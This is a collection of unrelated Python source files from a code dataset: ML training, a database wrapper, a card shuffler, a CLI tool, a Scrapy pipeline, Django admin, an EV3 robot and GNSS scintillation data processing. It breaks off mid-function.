text stringlengths 38 1.54M |
|---|
import os
import torch
from torch import nn
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
import torch.optim as optim
from torchsummary import summary
import segmentation_models_pytorch as smp
from catalyst.dl.runner import SupervisedRunner
from catalyst.dl.callbacks import DiceCallback, EarlyStoppingCallback, InferCallback, CheckpointCallback
from catalyst.dl import utils
from datasets.dataset_38_cloud import get_preprocessing, get_training_augmentation, get_validation_augmentation, \
L8CLoudDataset
from transforms.utils import get_transform
from models.utils import get_model
from calc.trainer import acc_metric, train_org
def main():
# general
debug = False
epochs = 10
batch_size = 6
num_workers = 0
lr = 0.01
# dataset
base_dir = '/dataset/kaggle/38-cloud'
datatype_train = 'train' # 'test'
datatype_test = 'test'
include_nir = True
train_ratio = 0.8
# transforms
name_trans_train = 'albu_train_0'
name_trans_val = 'albu_val_0'
kwargs_trans = {
'resize': None # (384, 384)
}
name_preprocessing = 'xxxx'
# model
model_name = 'unet_smp' #'unet_0' #'segnet' #'unet_0'
# out_channels = 2
# kwargs_model = {
# 'out_channels': 2,
# 'in_channels': 4
# }
kwargs_model = {
'classes': 2,
'in_channels': 4
}
resume = None
# log
log_base_dir = os.path.join("./logs/38_cloud_test", model_name)
non_null_rate = 1.0
cloud_rate = None
processes = 12
torch.backends.cudnn.benchmark = True
if debug:
device = 'cpu'
else:
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# transform
transforms_train = get_transform(name=name_trans_train, **kwargs_trans)
# preprocessing
preprocessing = None
# ENCODER = 'resnet50'
# ENCODER_WEIGHTS = 'imagenet'
# preprocessing_fn = smp.encoders.get_preprocessing_fn(ENCODER, ENCODER_WEIGHTS)
# preprocessing = get_preprocessing(preprocessing_fn=preprocessing_fn)
# dataset
dataset = L8CLoudDataset(base_dir=base_dir, datatype=datatype_train, transforms=transforms_train,
preprocessing=preprocessing, include_nir=include_nir,
non_null_rate=non_null_rate,
cloud_rate=cloud_rate,
processes=processes)
# divide training set and validation set
n_samples = len(dataset) # n_samples is 60000
train_size = int(len(dataset) * train_ratio) # train_size is 48000
val_size = n_samples - train_size
train_ds, valid_ds = torch.utils.data.random_split(dataset, [train_size, val_size])
# DataLoader
train_dl = DataLoader(train_ds, batch_size=batch_size, shuffle=True, num_workers=num_workers)
valid_dl = DataLoader(valid_ds, batch_size=batch_size, shuffle=False, num_workers=num_workers)
loaders = {
"train": train_dl,
"valid": valid_dl
}
# model
model = get_model(name=model_name, **kwargs_model)
model.to(device)
if resume is not None:
model.load_state_dict(torch.load(resume, map_location=device))
# check model
xb, yb = next(iter(train_dl))
print(xb.shape, yb.shape)
print(model)
print(summary(model, input_size=tuple(xb.shape[1:])))
# loss
criterion = nn.CrossEntropyLoss().to(device)
# optim and lr scheduler
optimizer = torch.optim.Adam(model.parameters(), lr=lr)
lr_scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=10, gamma=0.1)
# scheduler = ReduceLROnPlateau(optimizer, factor=0.15, patience=2)
# log
tb_log_dir = os.path.join(log_base_dir, "tb")
dir_ckp = os.path.join(log_base_dir, "checkpoints")
if not os.path.exists(dir_ckp):
os.makedirs(dir_ckp)
# Tensorboard
writer = SummaryWriter(log_dir=tb_log_dir)
# display some examples in tensorboard
images, labels = next(iter(train_dl))
# originals = images * std.view(3, 1, 1) + mean.view(3, 1, 1)
writer.add_images('images/original', images[:, :3, ...], 0)
# writer.add_images('images/normalized', images, 0)
writer.add_graph(model, images.to(device))
# train
# normal pytorch procedure
# todo: check Satorch and save results
train_loss, valid_loss = train_org(model, train_dl, valid_dl, criterion, optimizer, device, acc_metric, dir_ckp,
scheduler=lr_scheduler, epochs=epochs, writer=writer)
# # pred todo: this should be moved to other code
# # dataset
# dataset = L8CLoudDataset(base_dir=base_dir, datatype=datatype_test, transforms=transforms_train,
# preprocessing=preprocessing, include_nir=include_nir,
# non_null_rate=non_null_rate,
# cloud_rate=cloud_rate,
# processes=processes)
# todo: Catalyst
# todo: Catalyst with smp
# todo: ignite ???
print(train_loss)
print(valid_loss)
# todo: pred
# todo: check accuracy measure
if __name__ == "__main__":
main()
|
#!/usr/bin/python
__author__="Paulo Victor Maluf"
__date__ ="$27/10/2014 13:35:12$"
from connection import Connect;
class Postgres(object):
def __init__(self, dsn=None):
self.dsn = dsn
self.connect()
def connect(self):
conn = Connect(self.dsn)
self.cursor = conn.cur()
def exec_sql(self, sql):
self.cursor.execute(sql)
return self.cursor.fetchall()
def __del__(self):
del self
|
# 經由亂數發撲克牌(52張),分為四組列印出來。
import random
list_four_suits = ['♠', '♥', '♦', '♣']
list_number = ['A', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K']
def produce_poker_list():
list_poker = []
for i in range(len(list_four_suits)):
for j in range(len(list_number)):
list_poker.append(list_four_suits[i]+list_number[j])
return list_poker
def shuffle(list_poker):
shuffled_poker = []
for i in range(len(list_poker)-1, -1, -1):
pick_poker = random.randint(0, i)
shuffled_poker.append(list_poker[pick_poker])
list_poker[i], list_poker[pick_poker] = list_poker[pick_poker], list_poker[i]
return shuffled_poker
def licensing_poker(shuffled_poker):
player_list = ['player_1:\t', 'player_2:\t', 'player_3:\t', 'player_4:\t']
shuffled_poker_player = [[], [], [], []]
for i in range(len(shuffled_poker)):
if i % len(player_list) == 0:
shuffled_poker_player[0].append(shuffled_poker[i])
elif i % len(player_list) == 1:
shuffled_poker_player[1].append(shuffled_poker[i])
elif i % len(player_list) == 2:
shuffled_poker_player[2].append(shuffled_poker[i])
else:
shuffled_poker_player[3].append(shuffled_poker[i])
for j in range(len(shuffled_poker_player)):
print('{}{}'.format(player_list[j], shuffled_poker_player[j]))
def main():
licensing_poker(shuffle(produce_poker_list()))
main() |
######################################
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
#__author__="lili36"
#__date__="2017-03-24"
######################################
"""
This module provide argv implementation
"""
import os
import sys
import logging
import json
from optparse import OptionParser
from optparse import IndentedHelpFormatter
from load_config import Config
from monitor_start import MonitorAgentStart
"""
import modules
"""
import modules
logging.basicConfig(filename='../log/Command.log',
level=logging.INFO,
format='%(asctime)s %(levelname)s : %(message)s '
' - %(filename)s: line %(lineno)d'
, datefmt='[%d/%b/%Y %H:%M:%S]')
class Command(object):
"""Command object, link argv and class"""
def __init__(self,usage):
"""
Initialization some value
self.args: additional argv
"""
formatter = IndentedHelpFormatter(max_help_position=400, width=800)
if usage is not None:
self.parser = OptionParser(formatter=formatter, usage=usage)
else:
self.parser = OptionParser(formatter=formatter)
self.parser.add_option('', "--conf_dir", help='specified the conf dir.')
self.parser.add_option('', "--log_dir", help='specified the conf dir.')
self.parser.add_option('', "--modules_dir", help='specified the log dir.')
self.parser.add_option('', "--strategy_pub_dir", help='specified the log dir.')
self.parser.add_option('', "--strategy_pri_dir", help='specified the log dir.')
self.args = ''
def set_args(self, args):
"""set additional value"""
self.args = args
def validate(self, options, args):
"""object check method"""
pass
def execute(self):
"""object execute method"""
(options, args) = self.parser.parse_args(self.args)
Config.conf_dir = Config.conf_dir if options.conf_dir is None else options.conf_dir
Config.log_dir = Config.log_dir if options.log_dir is None else options.log_dir
Config.modules_dir = Config.modules_dir if options.modules_dir is None else options.modules_dir
Config.strategy_public_dir = Config.strategy_public_dir if options.strategy_pub_dir is None else options.strategy_public_dir
Config.strategy_private_dir = Config.strategy_private_dir if options.strategy_pri_dir is None else options.strategy_private_dir
return True
class MonAgentStart(Command):
"""start monitor agent"""
def __init__(self, usage=None):
super(MonAgentStart, self).__init__(usage)
"""check method"""
def validate(self, options, args):
return True
"""execute method"""
def execute(self):
(options, args) = self.parser.parse_args(self.args)
if not self.validate(options, args):
self.parser.print_help()
return False
super(MonAgentStart, self).execute()
monitor_start_instance = MonitorAgentStart()
process_list=monitor_start_instance.kutype_mon_start()
print 'monitor agent start method'
class MonAgentStop(Command):
"""stop monitor agent"""
def __init__(self, usage=None):
super(MonAgentStop, self).__init__(usage)
self.parser.add_option('-F', '--force', action='store_true',\
dest='force', help='force stop monitor.')
def validate(self, options, args):
return True
def execute(self):
(options, args) = self.parser.parse_args(self.args)
if not self.validate(options, args):
self.parser.print_help()
return False
super(MonAgentStop, self).execute()
print 'monitor agent stop method'
class MonAgentReload(Command):
"""reload conf """
def __init__(self, usage=None):
super(MonAgentReload, self).__init__(usage)
def validate(self, options, args):
return True
def execute(self):
(options, args) = self.parser.parse_args(self.args)
if not self.validate(options, args):
self.parser.print_help()
return False
super(MonAgentReload, self).execute()
print 'monitor agent reload method'
class MonAgentRestart(Command):
"""restart monitor agent"""
def __init__(self, usage=None):
super(MonAgentRestart, self).__init__(usage)
def validate(self, options, args):
return True
def execute(self):
(options, args) = self.parser.parse_args(self.args)
if not self.validate(options, args):
self.parser.print_help()
return False
super(MonAgentRestart, self).execute()
print 'monitor agent restart method'
class CheckConf(Command):
"""check register conf"""
def __init__(self, usage=None):
super(CheckConf, self).__init__(usage)
def validate(self, options, args):
return True
def execute(self):
(options, args) = self.parser.parse_args(self.args)
if not self.validate(options, args):
self.parser.print_help()
return False
super(CheckConf, self).execute()
print 'Check Conf method'
class Help(Command):
"""help info"""
def __init__(self, usage=None, command_names=None, commands=None):
formatter = IndentedHelpFormatter(max_help_position=400, width=800)
self.parser = OptionParser(formatter=formatter, usage=usage)
if command_names is None:
self.command_names = {}
self.commands = {}
else:
self.command_names = command_names
self.commands = commands
self.usage = usage
def execute(self):
(options, args) = self.parser.parse_args(self.args)
if len(args) == 0:
print self.usage
print '\nAvailable subcommands:'
for command_name in self.command_names:
print '\t%s' % command_name
print ''
for arg in args:
if arg in self.commands:
self.commands[arg].parser.print_help()
else:
print '"%s": unknown command.' % arg
print ''
return True
if __name__ == "__main__":
debug_instance = Config()
json_fd = debug_instance.load_register_conf()
print int(json_fd['build']['kutype_num'])
|
# Сумма младшего разряда целой и старшего разряда дробной частей x
# является четным числом или 1-й разряд целой части больше 1-го
# разряда дробной части.
a = float(input())
b = a % 10
c = (a * 10) % 10
isSpecial = False
if (a + b) % 2 == 0:
isSpecial = True
elif b > c:
isSpecial = True
print(isSpecial)
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import os
from urllib.request import urlopen
# from scrapy.pipelines.images import ImagesPipeline
from imgdb import settings
class ImgdbPipeline(object):
def process_item(self, item, spider):
#print(spider.name,item,'已经到达管道')
dir_path = '%s\\%s'%(settings.IMAGES_STORE,spider.name)#存储路径
print ('dir_path',dir_path)
if not os.path.exists(dir_path):
os.makedirs(dir_path)#输入路径dir_path作为参数,生成目录
pic_url = item['image_urls']
image_name = pic_url.split('/')[-1]
#可以理解为,生成一个img_file对象,带有文件路径和文件名属性。
with open(r'%s\\%s'%(dir_path,image_name),'wb') as img_file:
conn = urlopen(pic_url)#下载图片,此时图片保存在内存中,同时赋值给变量conn
img_file.write(conn.read())#读取内存的图片数据,然后写入img_file
img_file.close()#关闭img_file对象,将图片的数据保存在相应文件名
return item
|
from django.contrib import admin
from .models import Address, Order, Table, Booking, Category, Product, ProductOrder
# Register your models here.
admin.site.register(Address)
admin.site.register(Order)
admin.site.register(Table)
admin.site.register(Booking)
admin.site.register(Category)
admin.site.register(Product)
admin.site.register(ProductOrder)
|
from robot import Pid, Robot, LineEdge, LineSensor
from pybricks.hubs import EV3Brick
from pybricks.ev3devices import (Motor, ColorSensor,
GyroSensor)
from pybricks.parameters import (Port, Stop, Direction, Color,
SoundFile, Button)
from pybricks.tools import wait, StopWatch
from pybricks.robotics import DriveBase
from pybricks.media.ev3dev import Font
def run(robot: Robot):
straight_line_follow_pid = Pid(1.5, 0, 10)
sharp_line_follow_pid = Pid(5, 0, 0)
turn_pid = Pid(10, 0, 5)
slow_turn_pid = Pid(3, 0, 0)
drive_pid = Pid(1, 0, 0)
robot.reset_sensors()
brick = EV3Brick()
brick_buttons = brick.buttons.pressed()
robot.drive(drive_pid, 200, 0, 2000)
robot.drive(drive_pid, 80, 0, 1000)
robot.move_linear(800, 3.6, False)
robot.drive(drive_pid, -200, 0, 1200)
return
while not any(brick.buttons.pressed()):
wait(10)
while any(brick.buttons.pressed()):
wait(10)
#Slide code, run directly after bench
robot.reset_sensors()
robot.move_linear(800, 1)
robot.drive(drive_pid, 200, 0, 300)
robot.turn(turn_pid, 80)
robot.drive(drive_pid, 200, 80, 1400)
robot.follow_line(straight_line_follow_pid, 100, 1750, LineSensor.LEFT, LineEdge.LEFT)
robot.turn(turn_pid, 60)
robot.drive(drive_pid, 200, 60, 1400)
robot.drive(drive_pid, -100, 60, 1400)
wait(500)
robot.drive(drive_pid, -200, 60, 1200)
robot.turn(turn_pid, -90)
robot.drive(drive_pid, 200, -90, 500)
robot.move_linear(-800, 1)
robot.stop_motors()
|
from matplotlib.dates import DateFormatter, HourLocator
from matplotlib.ticker import AutoMinorLocator
import matplotlib.dates as mdates
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import math as mt
import datetime
import glob
import csv
import os
class ProcessISMR():
def __init__(self):
self.pi = 3.14
# Read ISMR files
def read_file(self, file_path):
"""
Input file: ISMR file (*.ismr)
"""
self.df = pd.read_csv(file_path, header=None, squeeze=True)
return self.df
# Convert GPS time: week & seconds; to UTC time.
# OJO: It's missing the leapseconds, this value is obtain from the navigation file
def _GPS2UTCtime(self, row):
leapseconds = 0 # change
gpsweek = int(row[0])
gpsseconds = int(row[1])
datetimeformat = "%Y-%m-%d %H:%M:%S"
first_epoch = datetime.datetime.strptime("1980-01-06 00:00:00",datetimeformat)
elapsed = datetime.timedelta(days=(gpsweek*7),seconds=(gpsseconds-leapseconds))
return first_epoch + elapsed
# Convert SVID to PRN
# The PRN codes were obtained from PolaRx5S Reference Guide
def _get_PRN(self, row):
svid = int(row[1])
if 1<=svid<=37:
prn = "G"+str(svid)
elif 38<=svid<=61:
prn = "R"+str(svid-37)
elif svid==62:
prn = "NA"
elif 63<=svid<=68:
prn = "R"+str(svid-38)
elif 71<=svid<=106:
prn = "E"+str(svid-70)
elif 107<=svid<=119:
prn = "NA"
elif 120<=svid<=140:
prn = "S"+str(svid-100)
elif 141<=svid<=177:
prn = "C"+str(svid-140)
elif 181<=svid<=187:
prn = "J"+str(svid-180)
elif 191<=svid<=197:
prn = "I"+str(svid-190)
elif 198<=svid<=215:
prn = "S"+str(svid-157)
elif 216<=svid<=222:
prn = "I"+str(svid-208)
else:
prn = "svid not valid!"
return prn
# Change to UTC time and PRN
def normalize_df(self):
"""
Make the following changes:
1) GPS time -> UTC time
2) SVID -> PRN
Output: df
"""
# Change time
newDate = self.df[[0,1]].apply(self._GPS2UTCtime, axis=1)
self.df.insert(0,column="DateTime",value=0) # create new column
self.df["DateTime"] = newDate
del self.df[0]
del self.df[1]
# Change SVID to PRN
self.df[2] = self.df.apply(self._get_PRN, axis=1)
self.df.rename(columns={2:"PRN"}, inplace=True)
# Datetime as index
self.df.set_index("DateTime", inplace=True)
return self.df
def extract_columns(self, cols): # cols: list
"""Extract ["PRN"] + certain columns.
Input: list,
Output: df
"""
col_values = ["PRN"] + cols
self.df = self.df[col_values]
return self.df
def rename_column(self, currentColIndex, newColName):
self.df.rename(columns={currentColIndex: newColName}, inplace=True)
return 'Ok'
def check_columnNames(self):
"""
output: list
"""
return list(self.df.columns)
# Identify the available constellations
def check_constelations(self):
"""output: list
"""
const = self.df["PRN"].str[0].unique() # extract the first character of each cell
return const
# Convert to float
def convert2float(self, cols):
self.df[cols] = self.df[cols].astype('float')
return 'Ok'
# Filter data(S4, CN0) based on the angle of the elevation
def filter_dataframe(self, col='CN0_sig1', on='Elev', threshold=35, new_col_name=['CN0_sig1_1', 'CN0_sig1_2']):
"""
Filter the column 'col', based 'on' values from another column which has a certain
'threshold'. The new filtered 'col' is named 'new_col_name'.
OUTPUT: df, with 2 aditional columns based on the criteria. The first column has the values
lower than the threshold, whereas the second column has values greater than the threshold.
"""
# Aux function
def filter_col(row):
elev = row[0]
cn0 = row[1]
if elev < threshold:
return [cn0, np.nan]
else:
return [np.nan, cn0]
# Create 1 additional column with the filtered data
df_aux = self.df[[on, col]].apply(filter_col, axis=1, result_type="expand")
df_aux.rename(columns = {0:new_col_name[0], 1:new_col_name[1]}, inplace=True)
self.df = pd.concat([self.df, df_aux], join='inner', axis=1)
return 'Ok'
# Plot a column, for each PRN
def plot_fast(self, col): # col:str
"""Plot a column from a dataframe for each PRN
"""
#self.df.set_index("DateTime", inplace=True)
self.df.groupby("PRN")[col].plot(style='o-')
plt.ylabel(col)
plt.grid(which='both')
plt.savefig(col+".png")
return 'Ok'
class ProcessSBF(ProcessISMR):
"""
It helps to process asccii sbf streams obtained from
a SBF file and the tool sbf2asc.
"""
def __init__(self):
pass
def read_measEpoch(self, file_path):
"""
Read the MeasEpoch block asccii file. It contains
CN0 (dB-Hz) data.
-----
INPUT: csv or txt file (*.txt)
OUTPUT: df
"""
self.input_file_path = file_path
# Read file
self.df_cn = pd.read_csv(self.input_file_path, skiprows=[0,1,2,3,5], usecols=[0,1,9,11,17])
# Rename columns
self.df_cn.rename(columns={"MeasType":"Signal", "CN0_dBHz [dB-Hz]":"CN0"}, inplace=True)
#
return self.df_cn
def read_channelStatus(self, file_path):
"""
Read the ChannelStatus block asccii file. It contains
elevation(º) data.
-----
INPUT: csv or txt file (*.txt)
OUTPUT: df
"""
self.input_file_path = file_path
# Read file
self.df_elv = pd.read_csv(self.input_file_path, skiprows=[0,1,2,3,5], usecols=[0,1,2,14])
# Rename columns
self.df_elv.rename(columns={"Elevation [°]":"Elev"}, inplace=True)
#
return self.df_elv
def _convert_freq2code(self):
"""
Convert frequency to signal code. Review ISMR structure to
know the signal codes.
e.g. GPS_L1CA -> Sig1
OJO: Only GPS, GALILEO & SBAS constellations are considered
in order to save time. Uncomment another constellation
if you need it.
INPUT: df, with column "Signal" and others.
OUTPUT: df
"""
def get_CN0code(signal):
signal = signal.split("_")
const = signal[0]
try:
freq = signal[1]
except LookupError:
return np.nan
#
if const == "GPS":
if freq == "L1CA": return "Sig1"
elif freq == "L2C": return "Sig2"
elif freq == "L5": return "Sig3"
else: return np.nan
elif const == "GAL":
if freq == "L1BC": return "Sig1"
elif freq == "E5a": return "Sig2"
elif freq == "E5b": return "Sig3"
else: return np.nan
#elif const == "GLO":
# if freq == "L1CA": return "Sig1"
# elif freq == "L2C": return "Sig2"
# else: return np.nan
#elif const == "BDS":
# if freq == "B1": return "Sig1"
# elif freq == "B2": return "Sig2"
# elif freq == "B3": return "Sig3"
# else: return np.nan
elif const == "GEO": # SBAS
if freq == "L1" or freq == "L1CA": return "Sig1"
elif freq == "L5": return "Sig2"
else: return np.nan
#elif const == "QZS": # const name might change, verify!
# if freq == "L1CA": return "Sig1"
# elif freq == "L2C": return "Sig2"
# elif freq == "L5": return "Sig3"
# else: return np.nan
#elif const == "IRN": # const name might change, verify!
# if freq == "B1": return "Sig1"
# else: return np.nan
else: return np.nan
self.df["Signal"] = self.df["Signal"].astype(str).apply(get_CN0code)
# Drop nan values in "Signal" column
self.df.dropna(subset=["Signal"], inplace=True)
return self.df
def get_ampElev(self):
"""
Get a standar Amplitude-Elevation dataframe.
INPUT: amp file, elev file
OUTPUT: df
"""
# Join dfs: CN0 and Elev
self.df = self.df_cn.merge(self.df_elv, how='left', on=["TOW [s]", "WNc [w]", "SVID"])
# Change freq_code (GPS_L1CA) to sig code (Sig1)
self.df = self._convert_freq2code()
# Convert GPS to UTC time
self.df = self.GPS2UTCtime()
# Decimation
self.df = self._decimate_amplitude()
# Divide 'Signal' column into 3 columns
# Reindex
self.df = self.df.reset_index().set_index(['DateTime', 'SVID', 'Signal']).sort_index()
# Unstack
self.df = self.df.unstack(level=-1)
# Separate
self.df = self.df.reset_index()
self.df.set_index("DateTime", inplace=True)
# Select the min elevation value
self.df["Elev_"] = self.df["Elev"].apply(lambda x: np.nanmin(x), axis=1)
del self.df[("Elev","Sig1")]
del self.df[("Elev","Sig2")]
del self.df[("Elev","Sig3")]
self.df.set_axis(["PRN", "CN0_sig1", "CN0_sig2", "CN0_sig3", "Elev"], axis=1, inplace=True)
# Sort values by "PRN"
self.df = self.df.reset_index().sort_values(by=["PRN", "DateTime"]).set_index("DateTime")
# Reorder columns
columnsTitles = ['PRN', 'Elev', 'CN0_sig1', 'CN0_sig2','CN0_sig3']
self.df = self.df.reindex(columns=columnsTitles)
return self.df
def inputFile_info(self):
"""
Print input file information.
"""
with open(self.input_file_path, newline="") as f:
reader = csv.reader(f)
rows_target = [1,2]
j = 0
info = []
for row in reader:
if j <= max(rows_target):
if j in rows_target:
info += row
else:
break
j += 1
info = "__FILE INFO________\n" + "\n".join(info) + "\n___________________"
return print(info)
def check_columns(self):
"""
Print available column names
"""
return print(self.df.columns)
def select_columns(self, cols):
self.df = self.df.iloc[:,cols]
return self.df
def filter_column(self, columnName="Signal", value="GPS_L1CA"):
"""
Filter a 'value' from an specific 'columnName' of a df.
INPUT: columnName, value
OUTPUT: df
"""
mask = self.df[columnName]==value
self.df = self.df[mask]
return self.df
def power_intensity(self):
"""
Get power intensity in dB, from IQ components.
INPUT: df, with I and Q components
"""
def intensity(row):
value_i = row[0]
value_q = row[1]
amplitude = value_i**2 + value_q**2
return 10*mt.log10(amplitude) # dB
self.df["Amp"] = self.df[["I","Q"]].apply(intensity,axis=1)
return self.df
def GPS2UTCtime(self):
"""
Convert GPS (WN + TOW)
INPUT: df (implicit)
OUPUT: df
"""
def gps2utc(row):
leapseconds = 0 # change
gpsseconds = int(row[0])
gpsweek = int(row[1])
datetimeformat = "%Y-%m-%d %H:%M:%S"
first_epoch = datetime.datetime.strptime("1980-01-06 00:00:00",datetimeformat)
elapsed = datetime.timedelta(days=(gpsweek*7),seconds=(gpsseconds-leapseconds))
return first_epoch + elapsed
newDate = self.df.iloc[:,[0,1]].apply(gps2utc, axis=1)
# Create a new column at position 0
self.df.insert(0, column="DateTime", value=newDate)
# Remove some columns
del self.df["TOW [s]"]
del self.df["WNc [w]"]
# Set datetime as index
self.df.set_index("DateTime", inplace=True)
return self.df
def _decimate_amplitude(self):
"""
Decimate 2 samples per minute: min & max values.
INPUT: df, with DateTime index and columns: SVID,
Signal, CN0, Elev.
OUTPUT: df
"""
# Set multiindex
self.df = self.df.reset_index().set_index(['SVID', 'Signal', 'DateTime']).sort_index()
# Get max & min amplitude and elevation values over a 1m interval
level_values = self.df.index.get_level_values
self.df = (self.df.groupby([level_values(i) for i in [0,1]]
+[pd.Grouper(freq='T', level=-1)]).agg(["min", "max"]))
# Flatten and rename columns
index1 = self.df.columns.get_level_values(0)
index2 = self.df.columns.get_level_values(1)
new_columns = []
for i in range(4):
value = index1[i] + "_" + index2[i]
new_columns.append(value)
self.df.columns = new_columns
# Reset index
self.df = self.df.reset_index().set_index("DateTime").sort_index()
# Merge min & max values in a single column, and decrease the T=30s
# min
df_min = self.df.iloc[:,[0,1,2,4]]
df_min.rename(columns={"CN0_min":"CN0", "Elev_min": "Elev"}, inplace = True)
# max
df_max = self.df.iloc[:,[0,1,3,5]]
df_max.rename(columns={"CN0_max":"CN0", "Elev_max": "Elev"}, inplace = True)
# Add 30s to the index
df_max.index += datetime.timedelta(seconds=30)
# Join
self.df = pd.concat([df_min, df_max])
self.df.sort_index(inplace=True)
self.df.sort_values(by=["SVID","Signal"])
return self.df
def decimate_amplitude_aux(self):
"""
Decimate 2 samples per minute: min & max values.
"""
# Resampling each minute: min & max values
self.df = self.df.resample("T").agg(["min", "max"])
# Delete unused columns
del self.df["I"]
del self.df["Q"]
del self.df["Signal", "min"]
del self.df["SVID", "min"]
# Rename columns
index1 = self.df.columns.get_level_values(0)
index2 = self.df.columns.get_level_values(1)
new_columns = []
for i in range(4):
if i<2:
value = index1[i]
else:
value = index1[i] + "_" + index2[i]
new_columns.append(value)
self.df.columns = new_columns
# Create the df
df_min = self.df.iloc[:,0:3]
df_min.rename(columns={"Amp_min":"Amp"}, inplace=True)
df_max = self.df.iloc[:,[0,1,3]]
df_max.rename(columns={"Amp_max":"Amp"}, inplace=True)
df_max.index += datetime.timedelta(seconds=30)
self.df = pd.concat([df_min, df_max])
self.df.sort_index(inplace=True)
return self.df
def get_date(self):
"""
Get df date
"""
fecha = self.df.index[0]
fecha_s = datetime.datetime.strftime(fecha, "%y/%m/%d")
return fecha_s
def plot_fast(self, col="Amp"):
"""
Plot a column from a df. GPS|G03
"""
mask = self.df["PRN"]=="G03"
df_p = self.df[mask]
df_p[col].plot()
plt.xlabel("Time UTC")
plt.ylabel("Signal Intensity (dB)")
plt.title("Signal Intensity (dB)")
plt.title("GPS|G3", loc="right")
plt.title(f"{self.get_date()}", loc='left')
plt.grid(which='both')
plt.savefig("test.png")
return 'Ok'
class PlotsISMR():
def __init__(self, dataframe, ismr_file_name):
self.df = dataframe
self.file_name = ismr_file_name # e.g. ljic219b15.20_.ismr
# PLOT HELPER METHODS
# ------------
# Check no null column in the frequency column
def _check_noNull_values(self, const, freq):
mask = self.df["PRN"].str.contains(const)
df_aux = self.df[mask]
if df_aux[freq].isna().sum() < len(df_aux):
return True
else:
return False
def get_station_name(self):
"""
Get the station name based on the station code.
Add other stations names if neccessary.
"""
station_code = self.file_name[:4]
if station_code == "ljic":
return "Jicamarca"
elif station_code == "lsba":
return "San-Bartolomé"
else:
return ""
def get_output_figure_name(self):
station = self.file_name[:4]
doy = self.file_name[4:7]
yy = self.file_name[-8:-6]
fecha_s = doy + "/" + yy
fecha = datetime.datetime.strptime(fecha_s, "%j/%y")
fecha_new = datetime.datetime.strftime(fecha, "%y%m%d")
new_figure_name = station + "_" + fecha_new
return new_figure_name
# Extract PRNs of a constellation and freq, in which there is no null data
def extract_prns(self, const='G', freq='CN0_sig1'): # const: char (e.g. 'G')
prns = self.df["PRN"].unique().tolist()
PRNs = [value for value in prns if const in value]
PRNs.sort(key=lambda x: int(x[1:])) # sort in ascendent order
# Check no null columns in the prns
prn_values = []
for value in PRNs:
mask = self.df["PRN"] == value
df_test = self.df[mask]
if df_test[freq].isna().sum() < len(df_test): # when the column is not null
prn_values.append(value)
return prn_values
# Extract info from any variable such as: elevation or CN0
def get_variable(self, prn='G10', var='CN0_sig1'):
""" Get the values of a given variable, for each PRN
"""
mask = self.df["PRN"]==prn
df_aux = self.df[mask]
df_final = df_aux[var]
return df_final
def all_prns(self, const='G'):
if const=='G':
list_prns = [f'G{i+1:02d}' for i in range(32)]
elif const=='E':
list_prns = [f'E{i+1:02d}' for i in range(36)]
else:
list_prns = []
return list_prns
# Convert SBAS code to SVID (number only)
def _convert2SVID(self, prn='G10'):
if prn[0] == "S":
nn = int(prn[1:])
if 20 <= nn <= 40:
return str(nn + 100)
elif 41 <= nn <= 58:
return str(nn + 157)
else:
return str(nn)
else:
return prn
# Get the frequency name and value for a given PRN code and Freq code
def get_freq_name(self, const='G', freq_code=1):
if freq_code == 1:
if const == 'G':
return {"name":'L1CA', "value":"1575.42"}
elif const == 'R':
return {"name":'L1CA', "value":"1602"} # change
elif const == 'S':
return {"name":'L1CA', "value":"1575.42"}
elif const == 'J':
return {"name":'L1CA', "value":"1575.42"}
elif const == 'E':
return {"name":'L1BC', "value":"1575.42"}
elif const == 'C':
return {"name":'B1', "value":"1575.42"}
elif const == 'I':
return {"name":'B1', "value":"1176.45"}
else:
return "Insert a right code!"
elif freq_code == 2:
if const == 'G':
return {"name":'L2C', "value":"1227.60"}
elif const == 'R':
return {"name":'L2C', "value":"1246"} # change
elif const == 'J':
return {"name":'L2C', "value":"1227.60"}
elif const == 'E':
return {"name":'E5a', "value":'1176.45'}
elif const == 'C':
return {"name":'B2', "value":'1176.45'}
elif const == 'S':
return {"name":'L5', "value":'1176.45'}
else:
return "Insert a right code!"
elif freq_code == 3:
if const == 'G':
return {"name":'L5', "value":'1176.45'}
elif const == 'J':
return {"name":'L5', "value":'1176.45'}
elif const == 'E':
return {"name":'E5b', "value":'1207.14'}
elif const == 'C':
return {"name":'B3', "value":'1268.52'}
else:
return "Insert a right code!"
else:
return "Insert a right code!"
# Get the name for a given constelation code
def get_const_name(self, const='G'):
if const == 'G': return 'GPS'
elif const == 'R': return 'GLONASS'
elif const == 'E': return 'GALILEO'
elif const == 'S': return 'SBAS'
elif const == 'C': return 'BEIDOU'
elif const == 'J': return 'QZSS'
elif const == 'I': return 'IRNSS'
else:
return 'Incorrect PRN code!'
# Convert GPS into SBAS frequencies
def _convert_GPS2SBAS_frequency(self, freq='CN0_sig1'):
if freq == 'CN0_sig1': return freq
elif freq == 'CN0_sig3': return 'CN0_sig2'
# Append SBAS prns at the end of the PRN list, only for GPS const
def _append_sbas_prns(self, freq, PRNs):
while freq != 'CN0_sig2':
freq_sbas = self._convert_GPS2SBAS_frequency(freq)
PRNs_SBAS = self.extract_prns(const='S', freq=freq_sbas)
PRNs += PRNs_SBAS
break
return PRNs
# PLOT VARIABLES: CN0, S4
# --------------
# Plot CN0 vs time, and elevation vs time (PLOT TYPE I)
def plotCN0(self, pdf, const='G', freq='CN0_sig1'):
"""
Input:
- pdf: object to save into a pdf file
"""
if self._check_noNull_values(const, freq):
# Get file UTC date
figure_name = self.get_output_figure_name() # e.g. ljic_200926
fecha = figure_name[5:] # e.g. 200926
fecha2 = datetime.datetime.strptime(fecha, "%y%m%d")
fecha3 = datetime.datetime.strftime(fecha2,"%Y/%m/%d")
fecha2_tomorrow = fecha2 + pd.DateOffset(days=1)
fecha2_tomorrow = fecha2_tomorrow.to_pydatetime()
# Get UTC day range, to add a vertical strip
fecha_morning_first = fecha2 + pd.DateOffset(hours=11)
fecha_morning_first = fecha_morning_first.to_pydatetime()
fecha_morning_last = fecha2 + pd.DateOffset(hours=23)
